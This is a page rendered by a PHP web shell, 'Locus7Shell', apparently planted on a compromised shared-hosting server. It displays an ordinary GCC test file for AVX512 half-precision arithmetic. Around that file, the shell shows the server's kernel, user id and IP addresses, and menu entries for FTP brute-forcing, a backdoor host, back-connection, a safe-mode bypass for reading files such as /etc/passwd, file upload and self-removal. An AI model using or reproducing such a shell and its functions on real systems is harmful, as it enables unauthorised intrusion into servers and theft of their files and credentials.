Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/i386/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     avx512vlfp16-11b.c (2.48 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-do run { target avx512fp16 } } */
/* { dg-options "-O2 -mavx512fp16 -mavx512vl" } */

#include <string.h>
#include <stdlib.h>
static void do_test (void);

#define DO_TEST do_test
#define AVX512FP16
#include "avx512-check.h"
#include "avx512vlfp16-11a.c"

/* Get random float16 between -50.x to 50.x.  */
_Float16
get_float16_noround()
{
  return ((int) (100.0 * rand ()/ (RAND_MAX + 1.0)) - 50)
    + 0.1f * (int) (10 * rand() / (RAND_MAX + 1.0));
}

static void
do_test (void)
{
  _Float16 x[16];
  _Float16 y[16];
  _Float16 res_add[16];
  _Float16 res_sub[16];
  _Float16 res_mul[16];
  _Float16 res_div[16];
  for (int i = 0 ; i != 16; i++)
    {
      x[i] = get_float16_noround ();
      y[i] = get_float16_noround ();
      if (y[i] == 0)
    y[i] = 1.0f;
      res_add[i] = x[i] + y[i];
      res_sub[i] = x[i] - y[i];
      res_mul[i] = x[i] * y[i];
      res_div[i] = x[i] / y[i];

    }

  union128h u128 = { x[0], x[1], x[2], x[3], x[4], x[5], x[6], x[7] };
  union128h u128_1 = { y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7] };
  union256h u256 = { x[0], x[1], x[2], x[3], x[4], x[5], x[6], x[7],
      x[8], x[9], x[10], x[11], x[12], x[13], x[14], x[15] };
  union256h u256_1 = { y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7],
      y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15]};

  __m128h v128;
  __m256h v256;
  union128h a128;
  union256h a256;

  memset (&v128, -1, sizeof (v128));
  v128 = vadd128 (u128.x, u128_1.x);
  a128.x = v128;
  if (check_union128h (a128, res_add))
    abort ();
  memset (&v128, -1, sizeof (v128));
  v128 = vsub128 (u128.x, u128_1.x);
  a128.x = v128;
  if (check_union128h (a128, res_sub))
    abort ();
  memset (&v128, -1, sizeof (v128));
  v128 = vmul128 (u128.x, u128_1.x);
  a128.x = v128;
  if (check_union128h (a128, res_mul))
    abort ();
  memset (&v128, -1, sizeof (v128));
  v128 = vdiv128 (u128.x, u128_1.x);
  a128.x = v128;
  if (check_union128h (a128, res_div))
    abort ();

  memset (&v256, -1, sizeof (v256));
  v256 = vadd256 (u256.x, u256_1.x);
  a256.x = v256;
  if (check_union256h (a256, res_add))
    abort ();
  memset (&v256, -1, sizeof (v256));
  v256 = vsub256 (u256.x, u256_1.x);
  a256.x = v256;
  if (check_union256h (a256, res_sub))
    abort ();
  memset (&v256, -1, sizeof (v256));
  v256 = vmul256 (u256.x, u256_1.x);
  a256.x = v256;
  if (check_union256h (a256, res_mul))
    abort ();
  memset (&v256, -1, sizeof (v256));
  v256 = vdiv256 (u256.x, u256_1.x);
  a256.x = v256;
  if (check_union256h (a256, res_div))
    abort ();
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0055 ]--